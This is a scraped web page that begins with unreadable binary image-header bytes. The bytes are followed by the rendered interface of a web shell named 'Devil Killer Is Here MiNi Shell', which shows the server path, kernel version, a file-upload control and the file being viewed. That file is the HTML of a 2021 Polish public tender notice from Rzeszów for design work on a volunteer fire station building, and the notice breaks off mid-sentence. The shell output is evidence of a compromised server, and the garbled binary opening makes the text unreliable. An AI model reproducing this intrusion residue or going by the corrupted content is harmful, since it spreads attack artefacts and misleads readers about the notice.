JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210716/0011681901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00116819 z dnia 2021-07-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej na budowę budynku na potrzeby OSP Rzeszów Wilkowyja na dz. 1380/1 obr. 219 Wilkowyja Południe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Rzeszów - Urząd Miasta Rzeszowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000650614</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-064</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@erzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.erzeszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej na budowę budynku na potrzeby OSP Rzeszów Wilkowyja na dz. 1380/1 obr. 219 Wilkowyja Południe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23d30b34-e497-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00116819</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.erzeszow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">cd. z pkt.<br/>powyżej. 1. Komunikacja między Zamawiającym a Wykonawcami (składanie i wysyłanie dokumentów /<br/>oświadczeń / wyjaśnień / zawiadomień / informacji) odbywa się elektronicznie za pośrednictwem poczty<br/>elektronicznej przetargi@erzeszow.pl . 2. OFERTY wraz z dokumentami o których mowa w sekcji V pkt<br/>5.11 ogłoszenia składa się za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP (nazwa odbiorcy - Gmina Miasto Rzeszów, adres skrzynki ePuap<br/>uzupełni się automatycznie) udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania<br/>oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego<br/>postępowania. 3. Wykonawca zamierzający wziąć udział w postępowaniu, musi posiadać konto na<br/>ePUAP, na którym jest dostęp do „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. 4.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).5. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty wynosi 150<br/>MB.6. Identyfikator postępowania dla postępowania dostępny jest na "Liście wszystkich postępowań"<br/>na miniPortalu.7. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).8. Oferta musi<br/>być sporządzona w języku polskim w postaci elektronicznej w formacie danych zgodnym z formatami<br/>wyszczególnionymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie – zaleca się sporządzenie oferty w formatach .doc, .docx, .pdf . Ofertę<br/>należy złożyć, pod rygorem nieważności w formie elektronicznej, tj. w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym przez osobę/y uprawnioną/e.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-A.271.44.137.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz ze wszystkimi<br/>niezbędnymi uzgodnieniami w ramach zadania inwestycyjnego pn. „Budowa budynku na<br/>potrzeby OSP Rzeszów-Wilkowyja”Niniejsze opracowanie projektowe obejmuje zaprojektowanie<br/>budynku remizy Ochotniczej Straży Pożarnej w Rzeszowie na osiedlu Wilkowyja Południe wraz<br/>z niezbędną infrastrukturą i zagospodarowaniem terenu, przy ul. Olbrachta na działce nr 1380/1<br/>obr. 219 Wilkowyja Płd.Zamówienie obejmuje m.in. opracowanie koncepcji budowy budynku<br/>OSP Rzeszów Wilkowyja, łącznie z zagospodarowaniem terenu. Przedmiotowa koncepcja musi<br/>zawierać wizualizację przestrzenną obiektu, łącznie z zagospodarowaniem terenu wokół<br/>projektowanego budynku.Zamówienie obejmuje również wykonanie kompletnej dokumentacji,<br/>na podstawie której będzie możliwe uzyskanie decyzji pozwolenia na budowę oraz realizacja<br/>robót budowlanych.Budynek należy zaprojektować zgodnie z zapisami Uchwały Nr XLI/852/2020<br/>Rady Miasta Rzeszowa z dnia 30 grudnia 2020 r. w sprawie uchwalenia zmiany nr 300/5/2018 w<br/>części I miejscowego planu zagospodarowania przestrzennego nr 90/20/2004 „Wilkowyja –<br/>Kamionka II” w Rzeszowie oraz zgodnie z Uchwałą nr 283/34/2012 Prezydium Zarządu<br/>Głównego Związku Ochotniczych Straży Pożarnych RP z dnia 19 kwietnia 2012 r w sprawie<br/>ramowych wytycznych projektowania strażnic ochotniczych straży pożarnych Wymagania dot.<br/>budynku – zgodnie z załącznikiem nr 2 do Projektu umowy.Dodatkowo budynek musi zostać<br/>wyposażony we wszystkie niezbędne instalacje, służące pracy ochotniczej straży pożarnej, w<br/>tym hydrant wewnętrzny. Należy zaprojektować podłączenie budynku do sieci Resman,<br/>instalację fotowoltaiczną z panelami fotowoltaicznymi, wyposażoną w system zarządzania<br/>fotowoltaiką. Wytyczne do projektu instalacji fotowoltaicznych stanowią załącznik nr 1 do Opisu<br/>Przedmiotu Zamówienia.Wymagania dot. zagospodarowania terenu – zgodnie z załącznikiem nr 2 do projektu umowy.Wykaz niezbędnego wyposażenia należy ustalić z Zarządem Ochotniczej<br/>Straży Pożarnej Rzeszów – Wilkowyja. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65000000-3 - Obiekty użyteczności publicznej</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">259 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust.<br/>1 pkt 7 Pzp w wysokości do 10 000,00 zł netto.1. Określenie przedmiotu: Usługi projektowe dotyczące<br/>zagospodarowania terenu, przebudowy sieci, wykonania specjalnych wewnętrznych instalacji na<br/>potrzeby działalności OSP2. Zakres usług: Usługi projektowe dotyczące zagospodarowania terenu,<br/>przebudowy sieci, wykonania specjalnych wewnętrznych instalacji na potrzeby działalności OSP3.<br/>Warunki na jakich zostaną udzielone zamówienia: Zamówienie podobne zostanie zlecone nowym zamówieniem, gdy Zamawiający będzie dysponował środkami na wykonanie usług.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa. Określenie warunków:a) Wykonawca spełni warunek jeżeli<br/>wykaże że, nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wykonał, co najmniej jedno zamówienie* na usługę polegające na wykonaniu dokumentacji<br/>projektowej dotyczącej budowy budynku użyteczności publicznej** o powierzchni użytkowej<br/>minimum 400 m2.Przez zamówienia wykonane należy rozumieć:1) zamówienia rozpoczęte i<br/>zakończone w w/w okresie2) zamówienia zakończone w w/w okresie, których rozpoczęcie mogło<br/>nastąpić wcześniej niż w w/w okresie.b) Wykonawca spełni warunek jeżeli wykaże, że<br/>dysponuje lub będzie dysponował osobami do realizacji zamówienia posiadającymi<br/>doświadczenie/ uprawnienia budowlane***:a) Projektanta w specjalności architektonicznej:<br/>osoba która posiada uprawnienia budowlane do projektowania w specjalności architektonicznej<br/>bez ograniczeń i posiada doświadczenie polegające na wykonaniu jednej usługi* polegającej na<br/>opracowaniu dokumentacji projektowej dotyczącej budowy budynku użyteczności publicznej** o<br/>powierzchni użytkowej min. 400 m2,b) Projektanta w specjalności konstrukcyjno – budowlanej:<br/>osoba która posiada uprawnienia budowlane do projektowania w specjalności<br/>konstrukcyjnobudowlanej bez ograniczeń,c) Projektanta w specjalności instalacyjnej : osoba<br/>która posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych,<br/>kanalizacyjnych bez ograniczeń,d) Projektanta w specjalności instalacyjnej : osoba która<br/>posiada uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,e) Projektanta w<br/>specjalności instalacyjnej : osoba która posiada uprawnienia budowlane do projektowania w<br/>specjalności instalacyjnej w zakresie instalacji i urządzeń telekomunikacyjnych bez ograniczeń,f)<br/>Projektanta w specjalności inżynieryjne - drogowej : osoba która posiada uprawnienia<br/>budowlane do projektowania w specjalności inżynieryjnej - drogowej bez ograniczeń,* Przez<br/>jedno zamówienie (jedną usługę) należy rozumieć jedną umowę.** Budynek użyteczności<br/>publicznej w rozumieniu przepisów Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia<br/>2020 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie<br/>- § 3 ust. 6 ***Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie<br/>z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne<br/>uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im<br/>uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo Budowlane oraz przepisów ustawy z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej. Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem<br/>spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla<br/>poszczególnych funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług wykonanych, w okresie ostatnich 5 lat licząc wstecz od dnia<br/>w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych<br/>od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; Jeżeli wykonawca<br/>powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz<br/>usług dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczy, 2. wykaz osób,<br/>skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień i doświadczenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać:1) wypełniony formularz OFERTA; 2) dokument/y potwierdzający/e<br/>umocowanie do reprezentowania Wykonawcy i/lub podmiotu udostępniającego zasoby w celu<br/>potwierdzenia, że osoba działająca w imieniu Wykonawcy i/lub podmiotu udostępniającego<br/>zasoby jest umocowana do jego reprezentowania: a) odpis lub informacja z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia w/w dokumentów jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca i/lub podmiot udostępniający zasoby wskazał dane umożliwiające dostęp do tych<br/>dokumentów (w formularzu OFERTA i/lub druku zobowiązania podmiotu udostępniającego<br/>zasoby) oraz z zastrzeżeniem ppkt. b) ; b) jeżeli w imieniu wykonawcy i/lub podmiotu<br/>udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z dokumentów, o których mowa w ppkt. a), Zamawiający żąda od Wykonawcy pełnomocnictwa<br/>lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy i/lub<br/>podmiotu udostępniającego zasoby. W przypadku wykonawców zagranicznych należy dołączyć<br/>do OFERTY tłumaczenie niniejszych dokumentów na język polski ; c) pełnomocnictwo – jeśli<br/>wymagane do reprezentowania Wykonawcy/ów w przypadku, gdy: - Wykonawcę reprezentuje<br/>pełnomocnik, - ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia<br/>publicznego o treści wymaganej w art. 58 ust. 2 Pzp (dotyczy również wspólników spółki<br/>cywilnej), - umocowanie które nie wynika z ppkt. 2 a) i b) 3. zobowiązanie podmiotu<br/>udostępniającego zasoby lub inny dokument wraz z oświadczeniami podmiotu o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i Oświadczenia<br/>wskazane w sekcji V pkt 5.5 i 5.6 Ogłoszenia. Pozostałe dokumenty będą traktowane jako<br/>wspólne. 2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą stanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy dołączyć stosowne<br/>pełnomocnictwo. 3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą<br/>solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną<br/>w art. 366 Kodeksu cywilnego.4. Wszelka korespondencja będzie prowadzona wyłącznie z<br/>pełnomocnikiem.5. W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy wpisać<br/>dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienie, a<br/>nie tylko pełnomocnika.6. W formularzu OFERTA należy wskazać, które usługi wykonają<br/>poszczególni wykonawcy wspólnie ubiegający się o udzielenie 